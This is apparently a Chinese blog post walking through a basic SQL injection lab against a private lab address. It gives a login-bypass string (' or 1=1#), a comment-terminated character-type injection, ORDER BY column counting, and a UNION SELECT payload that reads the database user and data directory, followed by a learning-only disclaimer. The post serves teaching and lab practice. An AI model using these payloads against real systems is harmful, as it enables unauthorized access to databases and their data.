您当前的位置: 首页 >  sql

星球守护者

暂无认证

  • 2浏览

    0关注

    641博文

    0收益

  • 0浏览

    0点赞

    0打赏

    0留言

私信
关注
热门博文

SQL注入之注入原理

星球守护者 发布时间:2021-07-31 14:26:25 ,浏览量:2

文章目录
    • 注入原理-基础实验
      • 实验内容
        • 实验一:字符型注入
        • 实验二:联合注入
      • 免责声明

注入原理-基础实验 实验内容

1、访问172.16.12.2

在这里插入图片描述

2、万能密码登录 'or 1=1#

在这里插入图片描述

3、登陆后有两个注入实验,进行手工注入

在这里插入图片描述

实验一:字符型注入

使用hackbar输入?id=1’,查看报错回显,提示多了个分号 ’ 在这里插入图片描述

所以payload就可以这么写,用%23将后面内注释掉即可

Payload:

http://172.16.12.2/string.php?id=1'%23 

在这里插入图片描述

5、成功

在这里插入图片描述

实验二:联合注入

使用hackbar输入 ?id=1’,查看报错回显,提示多了个分号 ’

在这里插入图片描述

将分号 '去除,成功 Payload:

http://172.16.12.2/number.php?id=1%23 发现页面正常

在这里插入图片描述 在这里插入图片描述

7、判断列数 Payload:

http://172.16.12.2/number.php?id=1 order by 3 %23 页面没有报错
http://172.16.12.2/number.php?id=1 order by 4 %23 页面报错

在这里插入图片描述 在这里插入图片描述

8、使用联合查询语句,查询信息 Payload:

?id=-1 union select 1,current_user(),@@datadir #

在这里插入图片描述

在这里插入图片描述

免责声明

本文档供学习,请使用者注意使用环境并遵守国家相关法律法规! 由于使用不当造成的后果上传者概不负责!

关注
打赏
1662051426
查看更多评论
立即登录/注册

微信扫码登录

0.0365s